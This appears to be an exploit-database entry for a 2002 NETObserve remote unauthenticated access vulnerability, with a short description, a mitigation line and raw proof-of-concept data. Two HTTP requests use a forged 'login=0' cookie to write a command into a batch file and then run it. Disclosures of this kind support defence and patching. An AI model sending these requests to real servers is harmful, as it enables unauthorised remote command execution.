header-logo
Suggest Exploit
vendor:
NETObserve
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Unauthenticated Access
287
CWE
Product Name: NETObserve
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

NETObserve Remote Unauthenticated Access Vulnerability

NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. An attacker can exploit this vulnerability by sending a POST request with a malicious payload to the vulnerable server, followed by a GET request to execute the malicious payload. This may result in remote compromise of the system.

Mitigation:

Ensure that the software is updated to the latest version and that all users are authenticated before granting access to the system.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9319/info

NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. Due to the nature of the software, this could permit an attacker to execute commands remotely on an underlying system running the software. This may also expose privileged information about the system and its users. Successful exploitation will result in remote compromise of the system. 

REQUEST #1:

--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------

REQUEST #2:

--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0


--------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR